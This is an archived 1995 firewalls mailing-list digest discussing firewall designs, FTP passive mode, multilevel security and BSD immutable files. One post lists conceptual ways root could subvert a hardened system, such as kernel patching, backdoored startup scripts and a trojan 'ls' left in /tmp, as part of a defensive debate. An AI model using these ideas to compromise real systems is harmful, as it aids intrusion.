padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Intel firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk David rites: >> Any capacity or speed specs on this? >Padgett? You've done this kind of stuff already, right? In my experience, the limiting factor is the capacity of the NICs, even a speedy 286 can handle a single process. Might want to check out KarlBridge, it masks the O/S. Not sure about DrawBridge. As for 32bit et all, nothing stopping you from using it, the iapx chip just starts in Real mode, doesn't need to stay there. Netware is 32bit. In fact Novell Netware might be a good measure of what a PC is capable of though it has an incredible amount of overhead, anything less is faster (as I recall a 486/66 tends to get slower around 100 users but a 386-16 can handle 10 just fine. Warmly, Padgett From firewalls-owner Thu Aug 10 15:38:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA14342 for firewalls-outgoing; Thu, 10 Aug 1995 14:32:50 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA14318 for ; Thu, 10 Aug 1995 14:32:46 -0700 Received: from databus.databus.com(198.186.154.34) by miles via smap (V1.3) id sma014314; Thu Aug 10 14:32:24 1995 Date: Thu, 10 Aug 95 17:31 EDT Message-ID: <9508101731.AA26405@databus.databus.com> From: Barney Wolff To: clh@ptech.com (Charles L. Hutson), firewalls@greatcircle.com Subject: Re: Netscape's FTP through a Firewall Content-Length: 1574 Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: clh@ptech.com (Charles L. Hutson) > Date: Thu, 10 Aug 95 11:27:18 EDT > > Fortunately, the necessary mechanisms already exist in the protocol. > If the client sends a PASV command, the server will do a passive TCP > open on some random port, and inform the client of the port number. > The client can then do an active open to establish the connection. > > This is the part that confuses me. If the server is going to inform > my client of the port number "on some random port", 1) How am I going > to know which port to listen on to get this critical information? It > seems like my ftp client would have to be frantically scanning the > entire range above 1024 to get this information. 2) Isn't > this going to force me to leave the entire range above 1024 wide open > in my firewall configuration? The "random port" is the port the server picks to listen on (ie, the passive open). The server informs the client on the control connection, which is already set up. Using PASV makes it hard to put the *server* behind a firewall, because the server will be listening to random port numbers at various times. But it makes it much easier to put the *client* behind a firewall, because both the control and data connections are initiated by the client - so the firewall can block connections initiated from outside the firewall while allowing those from inside out. And, of course, a "stateful" filter that looks at the PORT/PASV info on the control connection can do the right thing for the data connection. Barney Wolff From firewalls-owner Thu Aug 10 15:47:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA10651 for firewalls-outgoing; Thu, 10 Aug 1995 13:10:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA10425 for ; Thu, 10 Aug 1995 13:09:59 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma009993; Thu Aug 10 13:07:40 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA28108 for ; Thu, 10 Aug 1995 15:13:51 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA28104 for ; Thu, 10 Aug 1995 15:13:51 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id PAA19950; Thu, 10 Aug 1995 15:06:26 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id PAA29045; Thu, 10 Aug 1995 15:06:24 -0500 Date: Thu, 10 Aug 1995 15:06:24 -0500 From: Rick Smith Message-Id: <199508102006.PAA29045@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Multilevel Security is good for firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Regarding the exchange: >> There's an outfit that builds a firewall running on DOS. >Any capacity or speed specs on this? Would it be too much to ask something like, "What kinds of attacks is this thing supposed to block, and what does it let through?" Like, "It's almost as fast at forwarding application level attacks as a low end filtering router." Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Aug 10 16:00:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18156 for firewalls-outgoing; Thu, 10 Aug 1995 15:38:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18101 for ; Thu, 10 Aug 1995 15:37:56 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma018033; Thu Aug 10 15:36:53 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id RAA04415 for ; Thu, 10 Aug 1995 17:43:11 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id RAA04411 for ; Thu, 10 Aug 1995 17:43:10 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id RAA26818; Thu, 10 Aug 1995 17:35:45 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id RAA02775; Thu, 10 Aug 1995 17:35:44 -0500 Date: Thu, 10 Aug 1995 17:35:44 -0500 From: Rick Smith Message-Id: <199508102235.RAA02775@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: s[id]ewinder Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brad Powell writes: >What I'm trying to say that you can't prove something "secure" by these >methods, only prove its insecure. >It would take a code review to prove secure, and then only if the reviewers >knew exactly what they were doing and were infalable. Pretty high hurdle >to jump eh... Take a look at the Orange Book A1 requirements. That's about the closest I've ever seen to something that "proves secure." If you look closely you realize it only does part of the job, yet it goes miles beyond code review. But it's so hard to do that the resulting system lags the technology by the time it hits the field. >I would at least like to see statements (for any products; I'm not limiting >or picking on any particular product here) along the lines of >"PRODUCT has been testd against the following attacks and proven to not >be suseptable to them" (and additionally detected and logs the attack) A variant of the "penetrate'n'patch" methodology, but relying on reported penetration techniques. This is OK for ensuring that old holes are patched, but it isn't proactive. The reason for using strong measures (type enforcement or MLS) is to have something to backstop the system if the first line of defense (efficient reactive bugfixing) isn't enough. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Aug 10 16:06:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA09405 for firewalls-outgoing; Thu, 10 Aug 1995 13:01:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA09355 for ; Thu, 10 Aug 1995 13:00:57 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma009336; Thu Aug 10 13:00:46 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id MAA04080; Thu, 10 Aug 1995 12:54:44 -0700 Received: from milkyway.com(198.53.167.2) by mycroft via smap (V1.3mjr) id sma004060; Thu Aug 10 12:54:17 1995 Received: from jupiter.milkyway.com (jupiter.milkyway.com [192.168.77.9]) by internet with ESMTP (DuhMail/2.0) id PAA08496; Thu, 10 Aug 1995 15:58:57 -0400 Received: from metis.milkyway.com (rootmcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id PAA23838; Thu, 10 Aug 1995 15:53:57 -0400 Received: from metis.milkyway.com by metis.milkyway.com (8.6.9/BSDI-Client) id QAA13240; Thu, 10 Aug 1995 16:06:27 -0400 Message-Id: <199508102006.QAA13240@metis.milkyway.com> X-Mailer: exmh version 1.6.1 5/23/95 X-Uri: http://www.milkyway.com/People/Michael_Richardson/Bio.html To: Rick Smith CC: firewalls@greatcircle.com Subject: Re: Multilevel Security is good for firewalls References: <199508101934.OAA27767@shade.sctc.com> In-reply-to: Your message of "Thu, 10 Aug 1995 14:34:59 CDT." <199508101934.OAA27767@shade.sctc.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 10 Aug 1995 16:06:24 -0400 From: Michael Richardson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mcr> So, you need B1 internally as well to be perfect. rsmith> It's a bad idea to put external servers inside your security rsmith> perimeter, given that such services are occasionally vulnerable to I was not talking about external servers. I was talking about internal clients. It is the old "but what if they download a virus/trojan/etc.." argument. Our recommendation is to put your "external servers" on a third interface, allow only the services intended to be offered to pass into the "service network", keep the service network from initiating any outgoing connections (so not one can use you to attack other people), and definitely do not let the service network talk to the private network. From firewalls-owner Thu Aug 10 16:08:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA10659 for firewalls-outgoing; Thu, 10 Aug 1995 13:10:31 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA10564 for ; Thu, 10 Aug 1995 13:10:14 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma010400; Thu Aug 10 13:09:33 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA28166 for ; Thu, 10 Aug 1995 15:15:47 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA28162 for ; Thu, 10 Aug 1995 15:15:46 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id PAA20027; Thu, 10 Aug 1995 15:08:25 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id PAA29106; Thu, 10 Aug 1995 15:08:23 -0500 From: Rick Smith Message-Id: <199508102008.PAA29106@shade.sctc.com> Subject: Re: Multilevel Security is good for firewalls To: firewalls@greatcircle.com Date: Thu, 10 Aug 1995 15:08:23 -0500 (CDT) Cc: smith@sctc.com (Rick Smith) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1143 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Continuing the discussion: >>Even if the firewall functions perfectly, you may have >>security problems because you perfectly pass some insecure protocol >>thru the firewall. > So, you need B1 internally as well to be perfect. It's a bad idea to put external servers inside your security perimeter, given that such services are occasionally vulnerable to overrun attacks. Packet and circult filters aren't very good at detecting those kinds of attack, either. A reasonable approach is to host Internet servers on something with nonbypassable access control (multilevel security or Type Enforcement). You could host the Internet visible server software on an external machine with MLS or TE. That keeps the server software from overrunning the machine and should also generate recognizable log messages if the software is being attacked (if you do it right). You use a separate domain/compartment and network interface to talk to the inside. So, if you are intent on placing your externally visible servers inside your firewall, a host with nonbypassable security is a good choice. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Aug 10 16:23:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA15832 for firewalls-outgoing; Thu, 10 Aug 1995 15:04:06 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA15804 for ; Thu, 10 Aug 1995 15:04:01 -0700 Received: from pao.translation.com(204.30.204.3) by miles via smap (V1.3) id sma015797; Thu Aug 10 15:03:45 1995 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id PAA02276; Thu, 10 Aug 1995 15:02:52 -0700 Date: Thu, 10 Aug 1995 15:02:52 -0700 Message-Id: <199508102202.PAA02276@translation.com> Received: from unknown(204.30.204.114) by pao via smap (V1.3mjr) id sma002274; Thu Aug 10 15:02:50 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: mjr@iwi.com, mdr@vodka.sse.att.com From: afoss@translation.com (Andrew Foss) Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls Cc: steveg@cseic.saic.com, firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We believe that any general purpose OS(especially UNIX), is less than ideal for a FW, since it has a lot of overhead and a lot of potential for security holes due to it's complexity. A special purpose system with a very small code base and NO extra unnecessary services can provide the best performing most secure firewall. At 08:59 AM 8/10/95 -0700, mjr@iwi.com wrote: >mdr@vodka.sse.att.com writes: >>I don't know how BSD implements the sappnd or schg features for files. >>But if it involves permission bits or other data in the inode of the >>file, then it may be possilbe for a root user to change the inode's >>contents by seeking to the appropriate spot on the block or raw device >>and updating the inode. That's may sound hard to do, but it's not. > > The immutable bit stuff is pretty cleanly implemented and >makes a lot of sense. Once you've put the system into multiuser mode, >write access is disabled to the raw and cooked devices -- so forget >using fsdb to pop the inode. Ditto kmem -- used to be you could pop >the version of an inode in the kernel inode cache and not even have to >touch the disk. :) > >>Alternatively, root can patch /unix or the running system image to >>ignore the bits where ever they may be stored. Basically just replace >>part of the code in the function that does the check with an early >>return or jump or register set. > > [It's /bsd, not /unix. UNIX is a trademark of somebody or >other and they used to sue people over that distinction. :)] > > Patching the running system image usually requires write >access to /dev/kmem, etc, which is blocked in multiuser mode. I suppose >you theoretically might manage to find a way of overrunning some >part of the kernel to implement a "patch" to it, but the traditional >tricks are blocked off. Patching the buffer cache, ditto. > > Patching the on-disk copy of the kernel would require writing >the file, which, presumably, is something you'd want to keep immutable. > > The idea of immutable files is pretty sound, and the guys >who did it have thought it through pretty thoroughly. > >mjr. > Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd. FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Thu Aug 10 16:30:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18028 for firewalls-outgoing; Thu, 10 Aug 1995 15:36:01 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA17962 for ; Thu, 10 Aug 1995 15:35:51 -0700 Received: from aegis.ptech.com(165.166.50.2) by miles via smap (V1.3) id sma017949; Thu Aug 10 15:35:40 1995 Received: from magnum.ptech.com by nexus.ptech.com (5.x/Piedmont Technology Group) id AA01373; Thu, 10 Aug 1995 18:34:38 -0400 From: clh@ptech.com (Charles L. Hutson) Message-Id: <9508102234.AA01373@nexus.ptech.com> Subject: Re: Netscape's FTP through a Firewall To: firewalls@greatcircle.com Date: Thu, 10 Aug 95 18:33:44 EDT X-Mailer: ELM [version 2.3 PL0] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I recieved several responses like the one below and everyone seems to be in agreement that the port that the server listens on is sent back to the client through the initial connection. It was suggested below that maybe I wasn't blocking the incomming packets but that I was blocking the OUTGOING packets on those high ports.....I was. After opening up those high, outgoing TCP ports, things worked great. Thank you all for the help. clh | |On Thu, 10 Aug 1995, Charles L. Hutson wrote: | |> I'm having a problem using Netscape to FTP through my Firewall-1 firewall. |> I've done quite a bit of testing and research and have figured out that |> its because Netscape's version of ftp adheres to the specifications of |> RFC 1579. This RFC states that instead of doing a PORT command to tell |> the ftp server what port to open a data connection on, it does a PASV |> command. The following quote is from the above RFC: |> |> Fortunately, the necessary mechanisms already exist in the protocol. |> If the client sends a PASV command, the server will do a passive TCP |> open on some random port, and inform the client of the port number. |> The client can then do an active open to establish the connection. |> |> This is the part that confuses me. If the server is going to inform |> my client of the port number "on some random port", 1) How am I going |> to know which port to listen on to get this critical information? It |> seems like my ftp client would have to be frantically scanning the |> entire range above 1024 to get this information. 2) Isn't |> this going to force me to leave the entire range above 1024 wide open |> in my firewall configuration? | |The reply to the pasv message is of a parsable format. | |Here is a log of such a session. Numbered lines are from the server. |-=-=-=-=- |user anonymous |331 Guest login ok, send e-mail address as password. |pass njs@scifi |230 Guest login ok, access restrictions apply. |pasv |227 Entering Passive Mode (127,0,0,1,6,222) |-=-=-=-=- |This tells me that I should initiate the next data connection to |127.0.0.1, port 1758, The 6 is the first octet of the port number, and |the 222 is the second octet, in network order. So the client knows |exactly which ip address and port to open the connection to. | |This is done so that I, as a client, can open the connection, and |eliminates the usual FTP problem of needing to allow incoming connections |to high ports that you run into when you use the ports command. It also |allows netscape to easily work with IP Masquerading at the client end. | |> As it stands, I can't FTP through Netscape because my firewall blocks |> that incomming random packet. Can anyone provide any suggestions. | |It is more likely that your firewall only allows outgoing connections to |certain ports, and not to the range of ports above 1024. | |-- |Nick Simicich - njs@scifi.emi.net - (last choice) njs@bcrvm1.vnet.ibm.com |http://scifi.emi.net/njs.html -- Stop by and Light Up The World! | | _______________________________________ / ____ _____ _____ \ Charles L. Hutson, clh@ptech.com / ____// // // ___ Technical Services \ Systems Engineer / // // //___// Division /\ Piedmont Technology Group /__________________________________________/ / Phone 704.523.2400 \__________________________________________\/ Fax 704.523.7764 From firewalls-owner Thu Aug 10 17:32:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA23260 for firewalls-outgoing; Thu, 10 Aug 1995 16:31:32 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA23146 for ; Thu, 10 Aug 1995 16:31:17 -0700 Received: from citecuh.citec.qld.gov.au(203.5.10.10) by miles via smap (V1.3) id sma022958; Thu Aug 10 16:30:04 1995 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id JAA06715; Fri, 11 Aug 1995 09:24:33 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma006709; Fri Aug 11 09:24:25 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA02756; Fri, 11 Aug 1995 09:29:23 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9508102329.AA02756@citecub.citec.qld.gov.au> Subject: Re: screened subnet & cisco performance To: meyerd@Mailer.Uni-Marburg.DE Date: Fri, 11 Aug 95 9:29:22 EST Cc: firewalls@greatcircle.com In-Reply-To: <9508101218.AA25532@Mailer.Uni-Marburg.DE>; from "meyer" at Aug 10, 95 2:27 pm X-Mailer: ELM [version 2.3 PL11] content-length: 899 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, The system I have is similar in layout to yours. Both routers have strong filtering and will only talk to the bastion host. There is no way for traffic to bypass the bastion. My suggestion re your filters is that you decide what services you are going to allow through your firewall and analyse the requirements from there. You will need to look at all the possible combinations of source-address and destination-address+port and whether the service is TCP or UDP based. You also need to consider anti-spoofing measures. Once you have done this analysis you can work out a set of filters. If you do not feel confident in your ability to do this analysis, then you should get help from someone who can do it. Otherwise you are putting your company at risk. Explain it to management. They will either pay for the help or pull the plug. Don't do half a job. Colin From firewalls-owner Thu Aug 10 17:34:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA26232 for firewalls-outgoing; Thu, 10 Aug 1995 17:02:22 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA26187 for ; Thu, 10 Aug 1995 17:02:15 -0700 Received: from proton.llumc.edu(143.197.200.1) by miles via smap (V1.3) id sma026170; Thu Aug 10 17:01:32 1995 Received: from mycroft.llumc.edu (mycroft.llumc.edu [143.197.200.18]) by proton.llumc.edu (8.6.12/8.6.9) with SMTP id RAA28636 for ; Thu, 10 Aug 1995 17:00:20 -0700 Date: Thu, 10 Aug 1995 17:00:19 -0700 (PDT) From: Michael Baumann To: firewalls@GreatCircle.COM Subject: Re: Multilevel Security is good for firewalls In-Reply-To: <199508102014.PAA29388@shade.sctc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 10 Aug 1995, Rick Smith wrote: > Marcus writes: > > > There's an outfit that builds a firewall running on DOS. > >When I first heard of it, I thought the idea was ridiculous, but > >in retrospect it's actually a really clever idea! There's no sendmail > >to worry about ("multitasking? Huh?") no network daemons, ... > > But outsiders must access these services somehow or other. If the > outsiders can send in data, then there are risks of bugs like the > httpd overrun hack or Morris' finger. On a DOS system, such a bug > immediately gives the attacker your server machine, firewall or not. > On Unix the guy at least has to bust down a few more barriers. On a > system with multilevel security or type enforcement, they face a > pretty serious barrier. Can I make a point here... It would seem that we have a problem in assumptions being made. That is assumption, as I see it, is the the DOS based firewall is an application proxy type, that Marcus is well known for. What if it is just a fancy packet filter? You know, single thread, single application, does not really listen to anything. Kinda like the Sun's Sunscreen? Given this, there is nothing to attack, or overrun on the box. If you do manage to overrun anything, the box crashes, and stops forwarding. Fail-safe. The TAMU drawbridge is an excellent example of what a DOS based firewall can do. It is fast, and simple to configure. I have extended ours to do logging and so forth but still very fast. And a perfect example of K.I.S.S. in action. For those that start to say "Application Proxy is the only way to go!" I can only say - For us, a packet filter met the requirements of our security policy. And that is what drove our decision. Michael Baumann Electus Technology Inc. / Loma Linda University Medical Center San Bernardino, California. (909)799-8308 |Internet: baumann@llumc.edu From firewalls-owner Thu Aug 10 19:00:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01400 for firewalls-outgoing; Thu, 10 Aug 1995 18:51:24 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01372 for ; Thu, 10 Aug 1995 18:51:20 -0700 Received: from slip168-199.sy.au.ibm.net(129.37.168.199) by miles via smap (V1.3) id sma001321; Thu Aug 10 18:49:58 1995 Received: by localhost (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA0042; Fri, 11 Aug 95 11:45:06 -0700 Message-Id: <9508111845.AA0042@localhost> Mime-Version: 1.0 Date: Fri, 11 Aug 95 11:43:54 +0000 From: spence4@ibm.net To: firewalls@greatcircle.com Subject: Proxies and Firewalls : Some Basic Questions X-Mailer: Ultimedia Mail/2 Lite, IBM T. J. Watson Research Center Content-Id: <38_77_1_808155835> Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I've just subscribed to the 'firewalls' mailing list although I've been reading the FAQ and the mailing list archives for a couple of weeks now. I'm on a security committee for my organisation and we are seeking to put in an internet connection. I may also be involved in the implemetation as I have a technical background (though not in unix or Internet). My question is down to the basics I suppose. My understanding is that you can protect your internal network from unwanted intruders by two methods, firewall and proxy servers. My organisation has been considering the Firewall-1 product. However, an argument has been presented internally that proxy servers are much more secure and can not be bypassed by unwanted intruders. Is this true? Are proxies totally secure? Also, what are the limitation of proxy servers (I have read that you require modified client programs). Does anyone have any recommendations on proxy servers (commercial or otherwise) and what is the availability of client programs. Finally, what are the advantages/disadvantages of firewalls. My reading indicates that there is more flexibility but the downside is security exposures. Also, how do proxies work through firewalls (as I've read this is possible also). With regards to the mailing list archives, what program do I use on my Intel PC to read, for example, firewalls.9508.z . I assume that this program is compressed in some format. I want to FTP some of the archives so I can read off-line. Thanks and regards, //---------------------------------------------------------- // Colin Spence // Melbourne, Australia // SPENCE4@IBM.NET From firewalls-owner Thu Aug 10 20:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA03659 for firewalls-outgoing; Thu, 10 Aug 1995 20:21:55 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA03619 for ; Thu, 10 Aug 1995 20:21:50 -0700 Received: from caldecot.tcs.com.sg(203.120.5.2) by miles via smap (V1.3) id sma003609; Thu Aug 10 20:21:04 1995 Received: from [203.120.5.21] by caldecot.com.sg with SMTP (5.65/1.2-eef) id AA23668; Fri, 11 Aug 95 10:46:14 +0800 Date: Fri, 11 Aug 95 10:46:14 +0800 Message-Id: <9508110246.AA23668@caldecot.com.sg> X-Sender: sudu@tcs.com.sg Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: sudu@tcs.com.sg (Sudershan) Subject: Setting up a firewall X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My company is in the process of setting up a Firewall. I have been assigned to identify the Hardware and Software for this. We have a Novell LAN/WAN network with MSmail and over 2000 nodes which is mainly being used for office automation and SCO unix's boxes running TCP/IP and VAX'es running DEcnet. We have currently installed a Cern WEB server which is in an independent network by itself catering 10-15 users. Now we are planning to give access to all the 2000 users for MSmail and a few users to access the internet features. We also want to give access to our contractors to upload data from our server to their systems thru ftp. (that is users should be able to access our server using telnet/ftp/mail/Mosaic etc if permissions are given). I need some info about what kind of firewall hardware and software has to be installed in case of the above environment . As various vendors are talking about single layer firewall, 3 layer firewall, Screening routers etc. Thanks for the info in advance. Regards Sudershan From firewalls-owner Thu Aug 10 20:45:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA02942 for firewalls-outgoing; Thu, 10 Aug 1995 20:08:26 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA02927 for ; Thu, 10 Aug 1995 20:08:23 -0700 Received: from gw2.att.com(192.20.239.134) by miles via smap (V1.3) id sma002923; Thu Aug 10 20:08:00 1995 Received: from vodka.sse.att.com (vodka.gc.att.com) by ig1.att.att.com id AA26472; Thu, 10 Aug 95 13:26:02 EDT Message-Id: <9508101726.AA26472@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls To: mjr@iwi.com Date: Thu, 10 Aug 1995 13:27:54 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <199508101559.LAA13701@switchblade.iwi.com> from "Marcus J. Ranum" at Aug 10, 95 11:59:11 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus, > > The idea of immutable files is pretty sound, and the guys > who did it have thought it through pretty thoroughly. > > mjr. > Thankyou for the excellent information on bsd. Looks like they put some thought into it, that's good to see. So writing /dev/kmem or the raw divices won't work. Let me try a few more jabs at it if you don't mind, before we call it a security feature. How do they administer the system in mulituser mode? Presumably adding users and accounts and such would be disallowed. Also adding undesired services such as a telnetd or packet grabber would be disallowed. Ok then, no maintenance while in multi-user mode. Ouch! Would all of the cron scripts and rc scripts and network startup scripts also be immutable? If I can affect any file that root runs during single user mode, I can still hack the system, I just have to wait for a re-boot. Hmmm, can I force a re-boot? Hmmm, can I fill up the var file system, or is that immutable too! :) I'll just write to the tcp log files, surely the log files aren't immutable or unappendable. Denial of service attacks abound. Can I unlink and replace an immutable file if the directory is not immutable? (I bet that they thought of that one, it's too easy) Unless you limit the root user to the console in single user mode (which I bet they don't really do) some admin type has probably built a backdoor into the system for me already. /etc/rc2.d/S99update would do the trick. Do the packadd scripts do delayed updates? They've probably got a hook somewhere too. Maybe I'll just lay a T.H. around for root to trip over. Is the 'ls' command immutable? By the time you get around to locking all of the files that have to be immutable, you might as well make /, /var and /usr (please sub in bsd equivalent names) readonly file systems. Ouch! How does init ever go back to init state 1 ? Or is that disallowed too. If not, what secret does init know for changing the run state that root a root user can't do. Can I fool the system into thinking that it's back in init state 1? Is the init process protected from modifications by a process debugger? Is /dev/swap immutable? Forcing a reboot from scratch for every (even trivial admin) would work, but ouch! that hurts too! The immutable file concept may be more security speak than security feature. It might not work at all, but if it does it might hurt too much to use. A B1 system can protect all of the TCB by only allowing level 1 logins and level 1 network daemons while in multi user mode. The TCB is maintained at level 0. But the system can still be maintained in multiuser mode at the console or by dailin over a secure modem, or if the host is also a firewall you could limit level 0 logins to a secure interface and encrypted link. Each device and user has a clearance associated with it and both the device and the user must be cleared to level 0 before they can su to root. (Login as root is disallowed at C2 and higher, because it violates I&A, being an anonymous login) Hmmm, all of the useless B1 stuff sure is starting to sound nice. Can the user write /dev/kmem or /dev/dsk/xxx ? No they can't even see them! How about /unix ? Manditory policy protects it. Can they become root? Sorry tty device not cleared! Can they trip root? `>/tmp/ls` just creats a file that's labeled level 1, and root can't exec level 1 code because its not trusted. Modify config files? manditory policy protects them all. It's nice to have a model that hundreds of people have looked at. Mark Riggins Secure Systems Engineering AT&T Bell Labs PS: > [It's /bsd, not /unix. UNIX is a trademark of somebody or > other and they used to sue people over that distinction. :)] bsd??? never heard of it, we only run operating systems named after bad movies or single clergy ;) Seriously, I'd like to learn more about bsd, but its hard enough to stay up-to-date on my current scope. And thanks again for the info. From firewalls-owner Thu Aug 10 21:00:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA03804 for firewalls-outgoing; Thu, 10 Aug 1995 20:36:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA03795 for ; Thu, 10 Aug 1995 20:36:49 -0700 Received: from gw2.att.com(192.20.239.134) by miles via smap (V1.3) id sma003791; Thu Aug 10 20:36:29 1995 Received: from vodka.sse.att.com (vodka.gc.att.com) by ig1.att.att.com id AA01245; Thu, 10 Aug 95 14:32:13 EDT Message-Id: <9508101832.AA01245@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: Multilevel Security is good for firewalls To: mjr@iwi.com Date: Thu, 10 Aug 1995 14:34:02 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <199508101543.LAA13640@switchblade.iwi.com> from "Marcus J. Ranum" at Aug 10, 95 11:43:58 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mjr writes: > There's an outfit that builds a firewall running on DOS. > When I first heard of it, I thought the idea was ridiculous, but > in retrospect it's actually a really clever idea! There's no sendmail > to worry about ("multitasking? 